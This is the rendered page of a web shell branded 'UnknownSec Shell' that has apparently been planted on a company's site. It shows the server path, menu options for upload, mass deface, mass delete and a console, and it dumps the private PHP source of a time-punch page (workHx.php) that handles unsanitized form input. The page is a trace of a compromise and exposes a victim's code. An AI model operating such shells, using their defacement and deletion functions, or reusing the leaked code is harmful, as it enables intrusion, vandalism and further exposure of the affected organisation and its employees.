shell bypass 403
UnknownSec Shell
:
/
home
/
delvin
/
secure.delv-in.com
/ [
drwxr-x---
]
upload
mass deface
mass delete
console
info server
name :
workHx.php
<?php include('ini.php'); include('includes/private_header.php'); // echo __line__.": ".count($_SESSION['prGrpID'])." | f_group=".$_POST['f_group'] . " | ". $_SESSION['parentGrpID']."<br>"; if (!isset($_POST['f_payPeriodNum'])){ $_POST['f_payPeriodNum'] = $_SESSION['ppNum']; } if (!isset($_POST['userID'])){ $_POST['userID'] = ''; } if ($_POST['f_payPeriodNum'] < 0 && $_POST['submitBut'] == 'Update Display'){ $Template->set_alert('Please select a pay period'); } else if ($_POST['userID'] <= 0){ $Template->set_alert('Please select a team member', 'success'); } if ($_POST['submitBut'] == 'Save'){ if (isset($_POST['punchID'])){ // ======= EDITING A PUNCH ======== $Punch_Cx = new Punch_Cx; if (!isset($_POST['punchTime'])){ $_POST['punchTime'] = ''; } if (isset($_POST['timeRadio']) || $_POST['customTime'] != ''){ // echo __line__.": time: ".$_POST['hr']. " - " . $_POST['min'] . " ". $_POST['ampm'] . "<br>"; if ($_POST['timeRadio'] == 'del'){ $time = ''; } else if ($_POST['timeRadio'] == 'custom'){ if ($_POST['ampm'] == 'PM' && $_POST['hr'] < 12){ $time = str_pad($_POST['hr'], 2, "0", STR_PAD_LEFT) + 12 . $_POST['min']; } else { $time = str_pad($_POST['hr'], 2, "0", STR_PAD_LEFT) . $_POST['min']; } // $time = str_replace(":", "", $_POST['customTime']); } else { $time = $_POST['timeRadio']; } // echo __LINE__.": punchTime=".$_POST['punchTime'].", timeRadio=".$_POST['timeRadio'].", punchcxID=".$_POST['punchcxID'].", punchID=".$_POST['punchID'].", whichPunch=".$_POST['whichPunch'].", jobAreaID=". $_POST['jobAreaID'] . ", time=". $time ."<br />"; if ($_POST['punchcxID'] == ''){ $Punch_Cx->add($_POST['punchID'], $_POST['userID'], $_POST['dateTS'], $time, $_POST['whichPunch'], $_POST['jobAreaID']); } else if ($_POST['punchcxID'] > 0 ){ if ($_POST['timeRadio'] == 'del'){ //=== delete corrected punch - revert to actual punch if ($Punch_Cx->del($_POST['punchcxID'], $_POST['userID'], $_POST['dateTS'])){ $Template->set_alert('Corrected punch deleted', 'success'); } else { $Template->set_alert('ERROR: Corrected punch was not deleted', 'error'); } } else { $Punch_Cx->modify($time, $_POST['punchcxID'], $_POST['userID'], $_POST['dateTS'], $_POST['jobAreaID']); } } } } else if (isset($_POST['ad_hoc_schedID'])){ //======= EDITING A MEAL (SCHEDULE) $Schedule_Ad_Hoc = new Schedule_Ad_Hoc(); $Schedule_Ad_Hoc->add_mod($_POST['ad_hoc_schedID'], $_POST['userID'], $_POST['start1'], $_POST['finish1'], $_POST['start2'], $_POST['finish2'], $_POST['meal_min1'], $_POST['meal_min2'], $_POST['dateTS'], $_POST['comment']); } } echo($Template->get_alerts()); //=========== SET VIEWS ================== if ($_SESSION['LIS'] != 'staff' && $_SESSION['LID'] > 0 ){ // show alerts and reminders // if ($_SESSION['LIS'] == 'consultant' || $_SESSION['LIS'] == 'superUser'){ // $Template->load('views/v_select_practice.php'); // } $Template->load('views/v_workHx.php'); } // echo __line__." home <pre>"; print_r($_SESSION); echo "</pre>"; include('includes/private_footer.php'); ?>
© 2026 UnknownSec